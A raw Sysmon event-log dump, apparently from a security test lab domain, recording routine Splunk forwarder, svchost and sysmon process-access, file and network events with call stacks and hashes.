07:54:31.373{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082046Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:31.373{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082045Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:31.373{2FDD8D40-AC98-615A-0500-00000000FD01}4121436C:\Windows\system32\csrss.exe{2FDD8D40-B337-615A-5E01-00000000FD01}2476C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000082044Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:31.373{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B337-615A-5E01-00000000FD01}2476C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000082043Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:31.374{2FDD8D40-B337-615A-5E01-00000000FD01}2476C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000082042Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:31.170{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D575856E184DFDFE59354159BFCA73E5,SHA256=FC26815A799A1711F88402EAEF6611BB92BED81C7F8244048D4B1F6827905A8F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104227Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:30.459{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49583-false10.0.1.12-8000- 23542300x8000000000000000104226Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:31.266{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=92828242E1F7A2C341160556D6F768B6,SHA256=1B09D92D181D997084E4E202E0CC5FFE54499844F4ACEB0EDCA0B2992E4C69AF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104229Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:32.266{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F3AAEDC605C5D964757BFB6EBFCD9560,SHA256=0BFCA87B3BD4F6140C65C76E0BA37D9861CC48E2A4CD6B8051606B81EAADC4D2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082073Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:32.686{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8A755023429F3457D7BFD3D7C66E1C78,SHA256=4D48A7FE7ABBBFF44D0FF08C77D0B6A27F51B5F0F5413993A3DBF881B02E7AD9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082072Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:32.686{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=745239B2D93C33C97B8345D4BBC89F5C,SHA256=8EFE8166344BE16A05DA53C317A70794B2132D50775A297AE42A8C9D76E660B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082071Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:32.686{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=977755B2A4ECDE51EE8CB141A698788E,SHA256=DA1297BE2A13B527024F2A5EAA62EB11B732E98CFDCE2C7B154DDCAFBAD4FA59,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000082070Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:32.295{2FDD8D40-B338-615A-5F01-00000000FD01}40523224C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082069Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:32.045{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B338-615A-5F01-00000000FD01}4052C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082068Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:32.045{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082067Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:32.045{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082066Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:32.045{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082065Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:32.045{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082064Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:32.045{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082063Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:32.045{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082062Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:32.045{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082061Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:32.045{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082060Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:32.045{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082059Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:32.045{2FDD8D40-AC98-615A-0500-00000000FD01}4121436C:\Windows\system32\csrss.exe{2FDD8D40-B338-615A-5F01-00000000FD01}4052C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000082058Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:32.045{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B338-615A-5F01-00000000FD01}4052C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000082057Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:32.047{2FDD8D40-B338-615A-5F01-00000000FD01}4052C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000104228Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:32.063{58E9C193-ACA7-615A-1300-00000000FC01}880NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=DC938AD812C8DC75AA1E2A8052610208,SHA256=864381BB7E28BBA7DB74C17887F7FC4DEB3912F66E476787306EA5A6AC118B16,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104230Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:33.282{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F3105EE6D8B9D139A1E05CAC01DFB4EA,SHA256=7A778243F952D532B25BB1B88D80652313D60562957063BFCE9644AE7E836018,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082088Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:31.646{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50074-false10.0.1.12-8000- 23542300x800000000000000082087Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:33.295{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9712DDA427A421D7EA5F37FD59F9C271,SHA256=6101CFBCDC98197B5C4C8314FE643EBDC7CC4B4CE58EC0ED7AF4FA050A1E0D25,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000082086Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:33.155{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B339-615A-6001-00000000FD01}2416C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082085Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:33.155{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082084Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 